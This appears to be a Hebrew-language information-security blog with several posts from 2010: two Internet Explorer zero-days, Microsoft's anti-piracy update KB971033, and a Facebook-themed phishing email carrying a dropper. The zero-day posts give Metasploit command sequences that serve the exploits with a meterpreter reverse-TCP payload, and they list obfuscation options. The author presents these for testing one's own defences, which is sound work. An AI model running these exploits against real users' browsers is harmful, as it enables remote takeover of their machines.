yet another zero day for microsoft iexplorer-CVE-2010-0806

שוב -בידקו את מערכות ההגנה שלכם :

Pירצה חדשה בIEXPLORER התגלת ע"י ישראלי בשם משה בן אבו ( כבוד!)
CVE-2010-0806
http://www.securitytube.net/Internet-Explorer-Iepeers-Pointer-Exploit-Metasploit-Demo-video.aspx

Microsoft Security Advisory 981374

Vulnerability in Internet Explorer Could Allow Remote Code Execution

Published: March 09, 2010
Updated: March 12, 2010

msf > use exploit/windows/browser/ie_iepeers_pointer


msf exploit(ie_iepeers_pointer) > show payloads

msf exploit(ie_iepeers_pointer) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ie_iepeers_pointer) > set LHOST [MY IP ADDRESS]

msf exploit(ie_iepeers_pointer) > exploit

בדיקת virtual patch's - או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY

virtual patch's או זיהוי וחסימת התקפה לפני שיחרור הטלאי הרשמי ל ZERODAY הם הגנה מעולה בזמן הפגיע ביותר למחשבים , כלומר הזמן בו המתקיפים יכולים להשתמש בפגיעות וזיכויי ההצלחה הם  קרוב ל 100%.
אך האם הפרסומים שיוצאים איתם חברות אבטחה המידע נכונים?
ארגונים מעטים מסמלצים התקפות ובודקים את ההגנות לZERODAY ב א מ ת .
אני ממליץ לכל אנשי האבטחה להתקין BACKTRACK ולהשתמש ב METASPLOIT או כלים אחרים לביצוע התקפה אמיתית תוך כדי שימוש בקוד הזמין באינטרנט לבדיקת מערכות האבטחה שלהם.
אין כאן צורך ב PENTEST מעמיק  וזאת צריכה להיות עבודה שהיא חלק מהשוטף .חלק נכבד מההתקפות ניתן לסמלץ בשעה עבודה.
אני אישית כבר עליתי על אבטחת שווא כזאת מחברה שלא אזכיר את שמה ובעקבות זה שונתה החתימה .

לדוגמא
ה Z0RO DAY האחרון מבית מיקרוסופט  המאפשר הרצת קוד על המותקף ע"י פיתויו ללחוץ f1 דרך הודעה הכתובה ב
VB

Microsoft Security Advisory 981169

Vulnerability in VBScript Could Allow Remote Code Execution

Published: March 01, 2010

במקום לשבת ולחקות ל PATCH -נבדוק האם קוד הEXPLOIT זמין וננסה לבדוק את חסינות מערכות האבטחה שלנו מולו
החל מהגנות בגלישה , IPS,MAIL ועד לרמת ה AV המקומי.

הקוד זמין לבדיקה ב METASPLOIT
לאחר כל ההגדרות והעדכונים נעלה אתר ברשת המבצע את ה EXPLOIT ע"י הרצץ הפקודות הבאות

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/browser/ie_winhlp32
msf exploit(ie_winhlp32) > show payloads
msf exploit(ie_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_winhlp32) > set LHOST [MY IP ADDRESS]
msf exploit(ie_winhlp32) > exploit

אופציות המודול:

SRVHOST	The local host to listen on. (default: 0.0.0.0)
SRVPORT	The local port to listen on. (default: 8080)
SSL	Negotiate SSL for incoming connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH	The URI to use for this exploit (default is random)
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
WORKSPACE	Specify the workspace for this module
HTML::base64	Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape	Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode	Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked	Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression	Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding	Enable folding of HTTP headers
HTTP::junk_headers	Enable insertion of random junk HTTP headers
TCP::max_send_size	Maximum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)

בהצלחה

מה עשרות אלפי משתמשי חלונות ברחבי העולם עשו השבוע?

עשרות אלפי משתמשים בעולם  כיוונו את המסך הבא כך:

הסיבה?
מיקרוסופט שיחררה עדכון דרך מנגנון windows update אשר כל תפקידו הוא למגר את תופעת העותקים הגנובים של מערכת ההפעלה windows 7 .

KB971033 -יורד ומותקן אוטומאטית במחשב ומזהה קרוב ל 70 סוגים שונים של קראקים וסיראלס לא חוקיים.בנוסף,העדכון מכיל מנגנון CALL HOME הפונה למיקרוסופט כל 90 יום ומוריד עדכונים ל WAT (windows activastion technology ) לזיהוי קראקים נוספים שיצוצו .מחשב שזוהה כלא חוקי יקבל מסכים מציקים ושאר הפתעות במיטב המסורת.

עכשיו ,בתור איש אבטחת מידע ,אני בדילמה...
מצד אחד ברור שפעילות מיקרוסופט היא לגיטימית ונועדה למקסם רווחים ולשמור על זכויות היוצרים (נניח רגע בצד את המחירים השערוריתיים והמונופוליזם הזוועתי).מצד שני ,מעתה ואילך ,אותם עשרות אלפי מערכות לא חוקיות לכאורה או שלא לכאורה (מה עם קורבנות אמיתיים?) לא יזכו לראות עדכוני אבטחה בחייהם!
ושלא יהיו טעויות - הקראק לפתרון החסימה בדרך, זה רק עניין של זמן עד שכל אותם מחשבים יחזרו למצבם ה"חוקי"  אך האם המשתמשים יאשרו מחדש פתיחה  של העדכונים האוטומטיים? זה לא יקרה .המחשבים האלו דינם להידבק ולהדביק  ובסופו של דבר גם מחזיקי העותקים החוקיים יפגעו בתהליך.

מננגנון העדכונים של מקרוסופט הופך שוב את עורו ממשהו בעל חשיבות למשהו שנוא שעדיף להשתיקו.

כל זה מוביל אותי לשתי מסקנות:

1. הבעיה היא כמו תמיד ביישום ולא במנגנון ההצפנה :) כלומר ,מיקרוסופט יכולה למצא דרך תקשורת חלופית לזיהוי עותקים לא חוקיים ללא שימוש במנגנון העדכונים ובכך גם לטפל בסוררים וגם לשמור על מערכת הפעלה מעודכנת ומאובטחת.
2. עוד עבודה בשבילי!

שבת שלום.

מתקפת PHISHING במסגרת אהבתנו ל FACEBOOK

עשרות מיילים נשלחו לארגון בו אני עובד בזו הלשון:

במבט מהיר על סגנון הטקסט ניתן לקבוע כי אנגלית איננה שפת האם של השולחים:)

בבדיקת הקובץ התקבלו התוצאות:

הקובץ מזוהה ע"י רוב חברות הAV כDROPPER - החלק הראשון של הטרויאני כלומר הקובץ ה"מכין את השטח" וממתין לביצוע הורדה של חלקים נוספים של הוירוס למטרון שונות

ראו הוזהרתם